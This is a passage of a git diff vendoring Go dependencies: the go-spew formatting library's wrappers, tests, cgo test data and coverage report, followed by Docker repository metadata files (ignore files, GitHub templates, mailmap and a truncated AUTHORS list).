error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Print(spew.NewFormatter(a), spew.NewFormatter(b)) +func Print(a ...interface{}) (n int, err error) { + return fmt.Print(convertArgs(a)...) +} + +// Printf is a wrapper for fmt.Printf that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. 
+// +// This function is shorthand for the following syntax: +// +// fmt.Printf(format, spew.NewFormatter(a), spew.NewFormatter(b)) +func Printf(format string, a ...interface{}) (n int, err error) { + return fmt.Printf(format, convertArgs(a)...) +} + +// Println is a wrapper for fmt.Println that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Println(spew.NewFormatter(a), spew.NewFormatter(b)) +func Println(a ...interface{}) (n int, err error) { + return fmt.Println(convertArgs(a)...) +} + +// Sprint is a wrapper for fmt.Sprint that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprint(spew.NewFormatter(a), spew.NewFormatter(b)) +func Sprint(a ...interface{}) string { + return fmt.Sprint(convertArgs(a)...) +} + +// Sprintf is a wrapper for fmt.Sprintf that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprintf(format, spew.NewFormatter(a), spew.NewFormatter(b)) +func Sprintf(format string, a ...interface{}) string { + return fmt.Sprintf(format, convertArgs(a)...) +} + +// Sprintln is a wrapper for fmt.Sprintln that treats each argument as if it +// were passed with a default Formatter interface returned by NewFormatter. It +// returns the resulting string. See NewFormatter for formatting details. 
+// +// This function is shorthand for the following syntax: +// +// fmt.Sprintln(spew.NewFormatter(a), spew.NewFormatter(b)) +func Sprintln(a ...interface{}) string { + return fmt.Sprintln(convertArgs(a)...) +} + +// convertArgs accepts a slice of arguments and returns a slice of the same +// length with each argument converted to a default spew Formatter interface. +func convertArgs(args []interface{}) (formatters []interface{}) { + formatters = make([]interface{}, len(args)) + for index, arg := range args { + formatters[index] = NewFormatter(arg) + } + return formatters +} diff --git a/vendor/github.com/davecgh/go-spew/spew/spew_test.go b/vendor/github.com/davecgh/go-spew/spew/spew_test.go new file mode 100644 index 0000000000..b70466c69f --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/spew_test.go @@ -0,0 +1,320 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew_test + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "testing" + + "github.com/davecgh/go-spew/spew" +) + +// spewFunc is used to identify which public function of the spew package or +// ConfigState a test applies to. 
+type spewFunc int + +const ( + fCSFdump spewFunc = iota + fCSFprint + fCSFprintf + fCSFprintln + fCSPrint + fCSPrintln + fCSSdump + fCSSprint + fCSSprintf + fCSSprintln + fCSErrorf + fCSNewFormatter + fErrorf + fFprint + fFprintln + fPrint + fPrintln + fSdump + fSprint + fSprintf + fSprintln +) + +// Map of spewFunc values to names for pretty printing. +var spewFuncStrings = map[spewFunc]string{ + fCSFdump: "ConfigState.Fdump", + fCSFprint: "ConfigState.Fprint", + fCSFprintf: "ConfigState.Fprintf", + fCSFprintln: "ConfigState.Fprintln", + fCSSdump: "ConfigState.Sdump", + fCSPrint: "ConfigState.Print", + fCSPrintln: "ConfigState.Println", + fCSSprint: "ConfigState.Sprint", + fCSSprintf: "ConfigState.Sprintf", + fCSSprintln: "ConfigState.Sprintln", + fCSErrorf: "ConfigState.Errorf", + fCSNewFormatter: "ConfigState.NewFormatter", + fErrorf: "spew.Errorf", + fFprint: "spew.Fprint", + fFprintln: "spew.Fprintln", + fPrint: "spew.Print", + fPrintln: "spew.Println", + fSdump: "spew.Sdump", + fSprint: "spew.Sprint", + fSprintf: "spew.Sprintf", + fSprintln: "spew.Sprintln", +} + +func (f spewFunc) String() string { + if s, ok := spewFuncStrings[f]; ok { + return s + } + return fmt.Sprintf("Unknown spewFunc (%d)", int(f)) +} + +// spewTest is used to describe a test to be performed against the public +// functions of the spew package or ConfigState. +type spewTest struct { + cs *spew.ConfigState + f spewFunc + format string + in interface{} + want string +} + +// spewTests houses the tests to be performed against the public functions of +// the spew package and ConfigState. +// +// These tests are only intended to ensure the public functions are exercised +// and are intentionally not exhaustive of types. The exhaustive type +// tests are handled in the dump and format tests. +var spewTests []spewTest + +// redirStdout is a helper function to return the standard output from f as a +// byte slice. 
+func redirStdout(f func()) ([]byte, error) { + tempFile, err := ioutil.TempFile("", "ss-test") + if err != nil { + return nil, err + } + fileName := tempFile.Name() + defer os.Remove(fileName) // Ignore error + + origStdout := os.Stdout + os.Stdout = tempFile + f() + os.Stdout = origStdout + tempFile.Close() + + return ioutil.ReadFile(fileName) +} + +func initSpewTests() { + // Config states with various settings. + scsDefault := spew.NewDefaultConfig() + scsNoMethods := &spew.ConfigState{Indent: " ", DisableMethods: true} + scsNoPmethods := &spew.ConfigState{Indent: " ", DisablePointerMethods: true} + scsMaxDepth := &spew.ConfigState{Indent: " ", MaxDepth: 1} + scsContinue := &spew.ConfigState{Indent: " ", ContinueOnMethod: true} + scsNoPtrAddr := &spew.ConfigState{DisablePointerAddresses: true} + scsNoCap := &spew.ConfigState{DisableCapacities: true} + + // Variables for tests on types which implement Stringer interface with and + // without a pointer receiver. + ts := stringer("test") + tps := pstringer("test") + + type ptrTester struct { + s *struct{} + } + tptr := &ptrTester{s: &struct{}{}} + + // depthTester is used to test max depth handling for structs, array, slices + // and maps. + type depthTester struct { + ic indirCir1 + arr [1]string + slice []string + m map[string]int + } + dt := depthTester{indirCir1{nil}, [1]string{"arr"}, []string{"slice"}, + map[string]int{"one": 1}} + + // Variable for tests on types which implement error interface. 
+ te := customError(10) + + spewTests = []spewTest{ + {scsDefault, fCSFdump, "", int8(127), "(int8) 127\n"}, + {scsDefault, fCSFprint, "", int16(32767), "32767"}, + {scsDefault, fCSFprintf, "%v", int32(2147483647), "2147483647"}, + {scsDefault, fCSFprintln, "", int(2147483647), "2147483647\n"}, + {scsDefault, fCSPrint, "", int64(9223372036854775807), "9223372036854775807"}, + {scsDefault, fCSPrintln, "", uint8(255), "255\n"}, + {scsDefault, fCSSdump, "", uint8(64), "(uint8) 64\n"}, + {scsDefault, fCSSprint, "", complex(1, 2), "(1+2i)"}, + {scsDefault, fCSSprintf, "%v", complex(float32(3), 4), "(3+4i)"}, + {scsDefault, fCSSprintln, "", complex(float64(5), 6), "(5+6i)\n"}, + {scsDefault, fCSErrorf, "%#v", uint16(65535), "(uint16)65535"}, + {scsDefault, fCSNewFormatter, "%v", uint32(4294967295), "4294967295"}, + {scsDefault, fErrorf, "%v", uint64(18446744073709551615), "18446744073709551615"}, + {scsDefault, fFprint, "", float32(3.14), "3.14"}, + {scsDefault, fFprintln, "", float64(6.28), "6.28\n"}, + {scsDefault, fPrint, "", true, "true"}, + {scsDefault, fPrintln, "", false, "false\n"}, + {scsDefault, fSdump, "", complex(-10, -20), "(complex128) (-10-20i)\n"}, + {scsDefault, fSprint, "", complex(-1, -2), "(-1-2i)"}, + {scsDefault, fSprintf, "%v", complex(float32(-3), -4), "(-3-4i)"}, + {scsDefault, fSprintln, "", complex(float64(-5), -6), "(-5-6i)\n"}, + {scsNoMethods, fCSFprint, "", ts, "test"}, + {scsNoMethods, fCSFprint, "", &ts, "<*>test"}, + {scsNoMethods, fCSFprint, "", tps, "test"}, + {scsNoMethods, fCSFprint, "", &tps, "<*>test"}, + {scsNoPmethods, fCSFprint, "", ts, "stringer test"}, + {scsNoPmethods, fCSFprint, "", &ts, "<*>stringer test"}, + {scsNoPmethods, fCSFprint, "", tps, "test"}, + {scsNoPmethods, fCSFprint, "", &tps, "<*>stringer test"}, + {scsMaxDepth, fCSFprint, "", dt, "{{} [] [] map[]}"}, + {scsMaxDepth, fCSFdump, "", dt, "(spew_test.depthTester) {\n" + + " ic: (spew_test.indirCir1) {\n \n },\n" + + " arr: ([1]string) (len=1 cap=1) {\n \n },\n" 
+ + " slice: ([]string) (len=1 cap=1) {\n \n },\n" + + " m: (map[string]int) (len=1) {\n \n }\n}\n"}, + {scsContinue, fCSFprint, "", ts, "(stringer test) test"}, + {scsContinue, fCSFdump, "", ts, "(spew_test.stringer) " + + "(len=4) (stringer test) \"test\"\n"}, + {scsContinue, fCSFprint, "", te, "(error: 10) 10"}, + {scsContinue, fCSFdump, "", te, "(spew_test.customError) " + + "(error: 10) 10\n"}, + {scsNoPtrAddr, fCSFprint, "", tptr, "<*>{<*>{}}"}, + {scsNoPtrAddr, fCSSdump, "", tptr, "(*spew_test.ptrTester)({\ns: (*struct {})({\n})\n})\n"}, + {scsNoCap, fCSSdump, "", make([]string, 0, 10), "([]string) {\n}\n"}, + {scsNoCap, fCSSdump, "", make([]string, 1, 10), "([]string) (len=1) {\n(string) \"\"\n}\n"}, + } +} + +// TestSpew executes all of the tests described by spewTests. +func TestSpew(t *testing.T) { + initSpewTests() + + t.Logf("Running %d tests", len(spewTests)) + for i, test := range spewTests { + buf := new(bytes.Buffer) + switch test.f { + case fCSFdump: + test.cs.Fdump(buf, test.in) + + case fCSFprint: + test.cs.Fprint(buf, test.in) + + case fCSFprintf: + test.cs.Fprintf(buf, test.format, test.in) + + case fCSFprintln: + test.cs.Fprintln(buf, test.in) + + case fCSPrint: + b, err := redirStdout(func() { test.cs.Print(test.in) }) + if err != nil { + t.Errorf("%v #%d %v", test.f, i, err) + continue + } + buf.Write(b) + + case fCSPrintln: + b, err := redirStdout(func() { test.cs.Println(test.in) }) + if err != nil { + t.Errorf("%v #%d %v", test.f, i, err) + continue + } + buf.Write(b) + + case fCSSdump: + str := test.cs.Sdump(test.in) + buf.WriteString(str) + + case fCSSprint: + str := test.cs.Sprint(test.in) + buf.WriteString(str) + + case fCSSprintf: + str := test.cs.Sprintf(test.format, test.in) + buf.WriteString(str) + + case fCSSprintln: + str := test.cs.Sprintln(test.in) + buf.WriteString(str) + + case fCSErrorf: + err := test.cs.Errorf(test.format, test.in) + buf.WriteString(err.Error()) + + case fCSNewFormatter: + fmt.Fprintf(buf, test.format, 
test.cs.NewFormatter(test.in)) + + case fErrorf: + err := spew.Errorf(test.format, test.in) + buf.WriteString(err.Error()) + + case fFprint: + spew.Fprint(buf, test.in) + + case fFprintln: + spew.Fprintln(buf, test.in) + + case fPrint: + b, err := redirStdout(func() { spew.Print(test.in) }) + if err != nil { + t.Errorf("%v #%d %v", test.f, i, err) + continue + } + buf.Write(b) + + case fPrintln: + b, err := redirStdout(func() { spew.Println(test.in) }) + if err != nil { + t.Errorf("%v #%d %v", test.f, i, err) + continue + } + buf.Write(b) + + case fSdump: + str := spew.Sdump(test.in) + buf.WriteString(str) + + case fSprint: + str := spew.Sprint(test.in) + buf.WriteString(str) + + case fSprintf: + str := spew.Sprintf(test.format, test.in) + buf.WriteString(str) + + case fSprintln: + str := spew.Sprintln(test.in) + buf.WriteString(str) + + default: + t.Errorf("%v #%d unrecognized function", test.f, i) + continue + } + s := buf.String() + if test.want != s { + t.Errorf("ConfigState #%d\n got: %s want: %s", i, s, test.want) + continue + } + } +} diff --git a/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go b/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go new file mode 100644 index 0000000000..5c87dd456e --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go @@ -0,0 +1,82 @@ +// Copyright (c) 2013 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when both cgo is supported and "-tags testcgo" is added to the go test +// command line. This code should really only be in the dumpcgo_test.go file, +// but unfortunately Go will not allow cgo in test files, so this is a +// workaround to allow cgo types to be tested. This configuration is used +// because spew itself does not require cgo to run even though it does handle +// certain cgo types specially. Rather than forcing all clients to require cgo +// and an external C compiler just to run the tests, this scheme makes them +// optional. +// +build cgo,testcgo + +package testdata + +/* +#include +typedef unsigned char custom_uchar_t; + +char *ncp = 0; +char *cp = "test"; +char ca[6] = {'t', 'e', 's', 't', '2', '\0'}; +unsigned char uca[6] = {'t', 'e', 's', 't', '3', '\0'}; +signed char sca[6] = {'t', 'e', 's', 't', '4', '\0'}; +uint8_t ui8ta[6] = {'t', 'e', 's', 't', '5', '\0'}; +custom_uchar_t tuca[6] = {'t', 'e', 's', 't', '6', '\0'}; +*/ +import "C" + +// GetCgoNullCharPointer returns a null char pointer via cgo. This is only +// used for tests. +func GetCgoNullCharPointer() interface{} { + return C.ncp +} + +// GetCgoCharPointer returns a char pointer via cgo. This is only used for +// tests. +func GetCgoCharPointer() interface{} { + return C.cp +} + +// GetCgoCharArray returns a char array via cgo and the array's len and cap. +// This is only used for tests. 
+func GetCgoCharArray() (interface{}, int, int) { + return C.ca, len(C.ca), cap(C.ca) +} + +// GetCgoUnsignedCharArray returns an unsigned char array via cgo and the +// array's len and cap. This is only used for tests. +func GetCgoUnsignedCharArray() (interface{}, int, int) { + return C.uca, len(C.uca), cap(C.uca) +} + +// GetCgoSignedCharArray returns a signed char array via cgo and the array's len +// and cap. This is only used for tests. +func GetCgoSignedCharArray() (interface{}, int, int) { + return C.sca, len(C.sca), cap(C.sca) +} + +// GetCgoUint8tArray returns a uint8_t array via cgo and the array's len and +// cap. This is only used for tests. +func GetCgoUint8tArray() (interface{}, int, int) { + return C.ui8ta, len(C.ui8ta), cap(C.ui8ta) +} + +// GetCgoTypdefedUnsignedCharArray returns a typedefed unsigned char array via +// cgo and the array's len and cap. This is only used for tests. +func GetCgoTypdefedUnsignedCharArray() (interface{}, int, int) { + return C.tuca, len(C.tuca), cap(C.tuca) +} diff --git a/vendor/github.com/davecgh/go-spew/test_coverage.txt b/vendor/github.com/davecgh/go-spew/test_coverage.txt new file mode 100644 index 0000000000..2cd087a2a1 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/test_coverage.txt @@ -0,0 +1,61 @@ + +github.com/davecgh/go-spew/spew/dump.go dumpState.dump 100.00% (88/88) +github.com/davecgh/go-spew/spew/format.go formatState.format 100.00% (82/82) +github.com/davecgh/go-spew/spew/format.go formatState.formatPtr 100.00% (52/52) +github.com/davecgh/go-spew/spew/dump.go dumpState.dumpPtr 100.00% (44/44) +github.com/davecgh/go-spew/spew/dump.go dumpState.dumpSlice 100.00% (39/39) +github.com/davecgh/go-spew/spew/common.go handleMethods 100.00% (30/30) +github.com/davecgh/go-spew/spew/common.go printHexPtr 100.00% (18/18) +github.com/davecgh/go-spew/spew/common.go unsafeReflectValue 100.00% (13/13) +github.com/davecgh/go-spew/spew/format.go formatState.constructOrigFormat 100.00% (12/12) 
+github.com/davecgh/go-spew/spew/dump.go fdump 100.00% (11/11) +github.com/davecgh/go-spew/spew/format.go formatState.Format 100.00% (11/11) +github.com/davecgh/go-spew/spew/common.go init 100.00% (10/10) +github.com/davecgh/go-spew/spew/common.go printComplex 100.00% (9/9) +github.com/davecgh/go-spew/spew/common.go valuesSorter.Less 100.00% (8/8) +github.com/davecgh/go-spew/spew/format.go formatState.buildDefaultFormat 100.00% (7/7) +github.com/davecgh/go-spew/spew/format.go formatState.unpackValue 100.00% (5/5) +github.com/davecgh/go-spew/spew/dump.go dumpState.indent 100.00% (4/4) +github.com/davecgh/go-spew/spew/common.go catchPanic 100.00% (4/4) +github.com/davecgh/go-spew/spew/config.go ConfigState.convertArgs 100.00% (4/4) +github.com/davecgh/go-spew/spew/spew.go convertArgs 100.00% (4/4) +github.com/davecgh/go-spew/spew/format.go newFormatter 100.00% (3/3) +github.com/davecgh/go-spew/spew/dump.go Sdump 100.00% (3/3) +github.com/davecgh/go-spew/spew/common.go printBool 100.00% (3/3) +github.com/davecgh/go-spew/spew/common.go sortValues 100.00% (3/3) +github.com/davecgh/go-spew/spew/config.go ConfigState.Sdump 100.00% (3/3) +github.com/davecgh/go-spew/spew/dump.go dumpState.unpackValue 100.00% (3/3) +github.com/davecgh/go-spew/spew/spew.go Printf 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Println 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Sprint 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Sprintf 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Sprintln 100.00% (1/1) +github.com/davecgh/go-spew/spew/common.go printFloat 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go NewDefaultConfig 100.00% (1/1) +github.com/davecgh/go-spew/spew/common.go printInt 100.00% (1/1) +github.com/davecgh/go-spew/spew/common.go printUint 100.00% (1/1) +github.com/davecgh/go-spew/spew/common.go valuesSorter.Len 100.00% (1/1) +github.com/davecgh/go-spew/spew/common.go valuesSorter.Swap 100.00% (1/1) 
+github.com/davecgh/go-spew/spew/config.go ConfigState.Errorf 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Fprint 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Fprintf 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Fprintln 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Print 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Printf 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Println 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Sprint 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Sprintf 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Sprintln 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.NewFormatter 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Fdump 100.00% (1/1) +github.com/davecgh/go-spew/spew/config.go ConfigState.Dump 100.00% (1/1) +github.com/davecgh/go-spew/spew/dump.go Fdump 100.00% (1/1) +github.com/davecgh/go-spew/spew/dump.go Dump 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Fprintln 100.00% (1/1) +github.com/davecgh/go-spew/spew/format.go NewFormatter 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Errorf 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Fprint 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Fprintf 100.00% (1/1) +github.com/davecgh/go-spew/spew/spew.go Print 100.00% (1/1) +github.com/davecgh/go-spew/spew ------------------------------- 100.00% (505/505) + diff --git a/vendor/github.com/docker/docker/.dockerignore b/vendor/github.com/docker/docker/.dockerignore new file mode 100644 index 0000000000..082cac9224 --- /dev/null +++ b/vendor/github.com/docker/docker/.dockerignore @@ -0,0 +1,4 @@ +bundles +.gopath +vendor/pkg +.go-pkg-cache diff --git a/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md 
new file mode 100644 index 0000000000..7362480a4a --- /dev/null +++ b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md @@ -0,0 +1,64 @@ + + +**Description** + + + +**Steps to reproduce the issue:** +1. +2. +3. + +**Describe the results you received:** + + +**Describe the results you expected:** + + +**Additional information you deem important (e.g. issue happens only occasionally):** + +**Output of `docker version`:** + +``` +(paste your output here) +``` + +**Output of `docker info`:** + +``` +(paste your output here) +``` + +**Additional environment details (AWS, VirtualBox, physical, etc.):** diff --git a/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md new file mode 100644 index 0000000000..426981828b --- /dev/null +++ b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md @@ -0,0 +1,30 @@ + + +**- What I did** + +**- How I did it** + +**- How to verify it** + +**- Description for the changelog** + + + +**- A picture of a cute animal (not mandatory but encouraged)** + diff --git a/vendor/github.com/docker/docker/.gitignore b/vendor/github.com/docker/docker/.gitignore new file mode 100644 index 0000000000..be8b03d17b --- /dev/null +++ b/vendor/github.com/docker/docker/.gitignore @@ -0,0 +1,33 @@ +# Docker project generated files to ignore +# if you want to ignore files created by your editor/tools, +# please consider a global .gitignore https://help.github.com/articles/ignoring-files +*.exe +*.exe~ +*.orig +*.test +.*.swp +.DS_Store +# a .bashrc may be added to customize the build environment +.bashrc +.editorconfig +.gopath/ +.go-pkg-cache/ +autogen/ +bundles/ +cmd/dockerd/dockerd +cmd/docker/docker +dockerversion/version_autogen.go +dockerversion/version_autogen_unix.go +docs/AWS_S3_BUCKET +docs/GITCOMMIT +docs/GIT_BRANCH +docs/VERSION +docs/_build +docs/_static +docs/_templates +docs/changed-files +# generated by man/md2man-all.sh +man/man1 +man/man5 
+man/man8 +vendor/pkg/ diff --git a/vendor/github.com/docker/docker/.mailmap b/vendor/github.com/docker/docker/.mailmap new file mode 100644 index 0000000000..fe99e2086f --- /dev/null +++ b/vendor/github.com/docker/docker/.mailmap @@ -0,0 +1,275 @@ +# Generate AUTHORS: hack/generate-authors.sh + +# Tip for finding duplicates (besides scanning the output of AUTHORS for name +# duplicates that aren't also email duplicates): scan the output of: +# git log --format='%aE - %aN' | sort -uf +# +# For explanation on this file format: man git-shortlog + +Patrick Stapleton +Shishir Mahajan +Erwin van der Koogh +Ahmed Kamal +Tejesh Mehta +Cristian Staretu +Cristian Staretu +Cristian Staretu +Marcus Linke +Aleksandrs Fadins +Christopher Latham +Hu Keping +Wayne Chang +Chen Chao +Daehyeok Mun + + + + + + +Guillaume J. Charmes + + + + + +Thatcher Peskens +Thatcher Peskens +Thatcher Peskens dhrp +Jérôme Petazzoni jpetazzo +Jérôme Petazzoni +Joffrey F +Joffrey F +Joffrey F +Tim Terhorst +Andy Smith + + + + + + + + + +Walter Stanish + +Roberto Hashioka +Konstantin Pelykh +David Sissitka +Nolan Darilek + +Benoit Chesneau +Jordan Arentsen +Daniel Garcia +Miguel Angel Fernández +Bhiraj Butala +Faiz Khan +Victor Lyuboslavsky +Jean-Baptiste Barth +Matthew Mueller + +Shih-Yuan Lee +Daniel Mizyrycki root +Jean-Baptiste Dalido + + + + + + + + + + + + + + +Sven Dowideit +Sven Dowideit +Sven Dowideit +Sven Dowideit <¨SvenDowideit@home.org.au¨> +Sven Dowideit +Sven Dowideit +Sven Dowideit + +Alexander Morozov +Alexander Morozov + +O.S. Tezer + +Roberto G. 
Hashioka + + + + + +Sridhar Ratnakumar +Sridhar Ratnakumar +Liang-Chi Hsieh +Aleksa Sarai +Aleksa Sarai +Aleksa Sarai +Will Weaver +Timothy Hobbs +Nathan LeClaire +Nathan LeClaire + + + + +Matthew Heon + + + + +Francisco Carriedo + + + + +Brian Goff + + + +Hollie Teal + + + +Jessica Frazelle +Jessica Frazelle +Jessica Frazelle +Jessica Frazelle +Jessica Frazelle +Jessica Frazelle +Jessica Frazelle + + + + +Thomas LEVEIL Thomas LÉVEIL + + +Antonio Murdaca +Antonio Murdaca +Antonio Murdaca +Antonio Murdaca +Antonio Murdaca +Darren Shepherd +Deshi Xiao +Deshi Xiao +Doug Davis +Jacob Atzen +Jeff Nickoloff +John Howard (VM) +John Howard (VM) +John Howard (VM) +John Howard (VM) +Madhu Venugopal +Mary Anthony +Mary Anthony moxiegirl +Mary Anthony +mattyw +resouer +AJ Bowen soulshake +AJ Bowen soulshake +Tibor Vass +Tibor Vass +Vincent Bernat +Yestin Sun +bin liu +John Howard (VM) jhowardmsft +Ankush Agarwal +Tangi COLIN tangicolin +Allen Sun +Adrien Gallouët + +Anuj Bahuguna +Anusha Ragunathan +Avi Miller +Brent Salisbury +Chander G +Chun Chen +Ying Li +Daehyeok Mun + +Daniel, Dao Quang Minh +Daniel Nephin +Dave Tucker +Doug Tangren +Frederick F. Kautz IV +Ben Golub +Harold Cooper +hsinko <21551195@zju.edu.cn> +Josh Hawn +Justin Cormack + + +Kamil Domański +Lei Jitang + +Linus Heckemann + +Lynda O'Leary + +Marianna Tessel +Michael Huettermann +Moysés Borges + +Nigel Poulton +Qiang Huang + +Boaz Shuster +Shuwei Hao + +Soshi Katsuta + +Stefan Berger + +Stephen Day + +Toli Kuznets +Tristan Carel + +Vincent Demeester + +Vishnu Kannan +xlgao-zju xlgao +yuchangchun y00277921 + + + + +Hao Shu Wei + + + + + + + +Shengbo Song mYmNeo +Shengbo Song + +Sylvain Bellemare + + + +Arnaud Porterie + +David M. 
Karr + + + +Kenfe-Mickaël Laventure + + + + + +Runshen Zhu +Tom Barlow +Xianlu Bird +Dan Feldman +Harry Zhang diff --git a/vendor/github.com/docker/docker/AUTHORS b/vendor/github.com/docker/docker/AUTHORS new file mode 100644 index 0000000000..246e2a33f5 --- /dev/null +++ b/vendor/github.com/docker/docker/AUTHORS @@ -0,0 +1,1652 @@ +# This file lists all individuals having contributed content to the repository. +# For how it is generated, see `hack/generate-authors.sh`. + +Aanand Prasad +Aaron Davidson +Aaron Feng +Aaron Huslage +Aaron Lehmann +Aaron Welch +Abel Muiño +Abhijeet Kasurde +Abhinav Ajgaonkar +Abhishek Chanda +Abin Shahab +Adam Avilla +Adam Kunk +Adam Miller +Adam Mills +Adam Singer +Adam Walz +Aditi Rajagopal +Aditya +Adolfo Ochagavía +Adria Casas +Adrian Moisey +Adrian Mouat +Adrian Oprea +Adrien Folie +Adrien Gallouët +Ahmed Kamal +Ahmet Alp Balkan +Aidan Feldman +Aidan Hobson Sayers +AJ Bowen +Ajey Charantimath +ajneu +Akihiro Suda +Al Tobey +alambike +Alan Scherger +Alan Thompson +Albert Callarisa +Albert Zhang +Aleksa Sarai +Aleksandrs Fadins +Alena Prokharchyk +Alessandro Boch +Alessio Biancalana +Alex Chan +Alex Coventry +Alex Crawford +Alex Ellis +Alex Gaynor +Alex Olshansky +Alex Samorukov +Alex Warhawk +Alexander Artemenko +Alexander Boyd +Alexander Larsson +Alexander Morozov +Alexander Shopov +Alexandre Beslic +Alexandre González +Alexandru Sfirlogea +Alexey Guskov +Alexey Kotlyarov +Alexey Shamrin +Alexis THOMAS +Ali Dehghani +Allen Madsen +Allen Sun +almoehi +Alvaro Saurin +Alvin Richards +amangoel +Amen Belayneh +Amit Bakshi +Amit Krishnan +Amit Shukla +Amy Lindburg +Anand Patil +AnandkumarPatel +Anatoly Borodin +Anchal Agrawal +Anders Janmyr +Andre Dublin <81dublin@gmail.com> +Andre Granovsky +Andrea Luzzardi +Andrea Turli +Andreas Köhler +Andreas Savvides +Andreas Tiefenthaler +Andrei Gherzan +Andrew C. 
Bodine +Andrew Clay Shafer +Andrew Duckworth +Andrew France +Andrew Gerrand +Andrew Guenther +Andrew Kuklewicz +Andrew Macgregor +Andrew Macpherson +Andrew Martin +Andrew Munsell +Andrew Po +Andrew Weiss +Andrew Williams +Andrews Medina +Andrey Petrov +Andrey Stolbovsky +André Martins +andy +Andy Chambers +andy diller +Andy Goldstein +Andy Kipp +Andy Rothfusz +Andy Smith +Andy Wilson +Anes Hasicic +Anil Belur +Anil Madhavapeddy +Ankush Agarwal +Anonmily +Anthon van der Neut +Anthony Baire +Anthony Bishopric +Anthony Dahanne +Anton Löfgren +Anton Nikitin +Anton Polonskiy +Anton Tiurin +Antonio Murdaca +Antonis Kalipetis +Antony Messerli +Anuj Bahuguna +Anusha Ragunathan +apocas +ArikaChen +Arnaud Lefebvre +Arnaud Porterie +Arthur Barr +Arthur Gautier +Artur Meyster +Arun Gupta +Asbjørn Enge +averagehuman +Avi Das +Avi Miller +Avi Vaid +ayoshitake +Azat Khuyiyakhmetov +Bardia Keyoumarsi +Barnaby Gray +Barry Allard +Bartłomiej Piotrowski +Bastiaan Bakker +bdevloed +Ben Firshman +Ben Golub +Ben Hall +Ben Sargent +Ben Severson +Ben Toews +Ben Wiklund +Benjamin Atkin +Benoit Chesneau +Bernerd Schaefer +Bert Goethals +Bharath Thiruveedula +Bhiraj Butala +Bilal Amarni +Bill W +bin liu +Blake Geno +Boaz Shuster +bobby abbott +boucher +Bouke Haarsma +Boyd Hemphill +boynux +Bradley Cicenas +Bradley 